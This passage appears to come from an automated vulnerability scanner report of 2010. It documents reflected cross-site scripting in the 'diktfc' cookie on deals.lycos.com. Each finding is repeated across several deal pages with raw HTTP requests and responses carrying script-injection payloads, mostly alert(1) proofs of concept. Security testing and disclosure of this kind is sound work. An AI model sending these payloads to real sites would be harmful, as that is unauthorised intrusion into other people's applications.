GET /deal/panasonic-58-1080p-plasma-w-tivo-1-228-414295 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A50667"><script>alert(1)</script>3e46c174419; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:36 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:36 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 16346
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... tp://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/panasonic-58-1080p-plasma-w-tivo-1-228-414295&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A50667"><script>alert(1)</script>3e46c174419&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8948a"%3balert(1)//0c42ac67901 was submitted in the diktfc cookie. This input was echoed as 8948a";alert(1)//0c42ac67901 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/panasonic-dmc-zs6-12mp-camera-for-150-414700 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A8948a"%3balert(1)//0c42ac67901; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:33:15 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:15 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18296
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d553c"><script>alert(1)</script>99f8fa73005 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/panasonic-dmc-zs6-12mp-camera-for-150-414700 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad553c"><script>alert(1)</script>99f8fa73005; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:33:13 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:14 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18319
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... ttp://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/panasonic-dmc-zs6-12mp-camera-for-150-414700&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad553c"><script>alert(1)</script>99f8fa73005&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d16e3"><script>alert(1)</script>e618ca21634 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/polaroid-dvf-720sc-sd-card-camcorder-50-414348 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad16e3"><script>alert(1)</script>e618ca21634; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:33:14 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:15 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18856
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... p://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/polaroid-dvf-720sc-sd-card-camcorder-50-414348&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad16e3"><script>alert(1)</script>e618ca21634&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3da3d"%3balert(1)//178fd7981ee was submitted in the diktfc cookie. This input was echoed as 3da3d";alert(1)//178fd7981ee in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/polaroid-dvf-720sc-sd-card-camcorder-50-414348 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3da3d"%3balert(1)//178fd7981ee; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:33:16 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:16 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18829
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dea67"><script>alert(1)</script>5b7fd28b581 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/samsung-32-720p-lcd-hdtv-for-330-414355 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Adea67"><script>alert(1)</script>5b7fd28b581; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:24 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:24 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17685
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... rc="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/samsung-32-720p-lcd-hdtv-for-330-414355&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Adea67"><script>alert(1)</script>5b7fd28b581&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e5a9"%3balert(1)//21691b5acad was submitted in the diktfc cookie. This input was echoed as 6e5a9";alert(1)//21691b5acad in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/samsung-32-720p-lcd-hdtv-for-330-414355 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6e5a9"%3balert(1)//21691b5acad; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:25 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:26 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17638
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a2e5"><script>alert(1)</script>04a9fd962a5 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/samsung-55-3d-ready-hdtv-w-3d-kit-2-099-414388 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3a2e5"><script>alert(1)</script>04a9fd962a5; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:23 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:23 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18207
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... p://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/samsung-55-3d-ready-hdtv-w-3d-kit-2-099-414388&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3a2e5"><script>alert(1)</script>04a9fd962a5&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14597"%3balert(1)//71a486517fb was submitted in the diktfc cookie. This input was echoed as 14597";alert(1)//71a486517fb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/samsung-55-3d-ready-hdtv-w-3d-kit-2-099-414388 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A14597"%3balert(1)//71a486517fb; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:24 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:24 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18181
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31ce5"><script>alert(1)</script>570dcb9c64e was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/samsung-nx10-15mp-dslr-camera-lens-423-413374 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A31ce5"><script>alert(1)</script>570dcb9c64e; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:33:28 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:28 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18069
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... tp://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/samsung-nx10-15mp-dslr-camera-lens-423-413374&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A31ce5"><script>alert(1)</script>570dcb9c64e&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46acf"%3balert(1)//6a7aece2843 was submitted in the diktfc cookie. This input was echoed as 46acf";alert(1)//6a7aece2843 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/samsung-nx10-15mp-dslr-camera-lens-423-413374 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A46acf"%3balert(1)//6a7aece2843; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:33:29 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:30 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17963
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4046a"><script>alert(1)</script>6e957a235e was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/samsung-sunburst-a697-cell-phone-50-414188 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A4046a"><script>alert(1)</script>6e957a235e; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:57 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:57 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17767
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... "http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/samsung-sunburst-a697-cell-phone-50-414188&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A4046a"><script>alert(1)</script>6e957a235e&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8f2f"%3balert(1)//00ef4809ce3 was submitted in the diktfc cookie. This input was echoed as c8f2f";alert(1)//00ef4809ce3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/samsung-sunburst-a697-cell-phone-50-414188 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac8f2f"%3balert(1)//00ef4809ce3; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:58 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:58 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17740
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20a9f"><script>alert(1)</script>2045b97a5bb was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/sharp-55-120hz-1080p-led-hdtv-1-200-414377 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A20a9f"><script>alert(1)</script>2045b97a5bb; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:23 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:23 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17219
